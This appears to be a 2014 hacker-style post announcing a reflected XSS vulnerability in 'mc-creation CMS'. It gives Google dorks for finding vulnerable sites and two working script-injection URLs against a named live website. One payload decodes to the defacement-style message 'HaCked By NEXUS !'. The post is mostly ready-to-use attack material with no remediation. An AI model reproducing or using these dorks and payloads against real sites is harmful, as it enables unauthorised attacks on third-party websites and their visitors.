Thursday, 3 July 2014

mc-creation CMS - XSS Vulnerability

Dorks:
intext:"web design solution" inurl:"product_view.php?pid="
intext:"web design solution"

Exploit:
"product_view.php?pid="

Examples & Live Demos:

Testing:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String to char:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E



NEXUS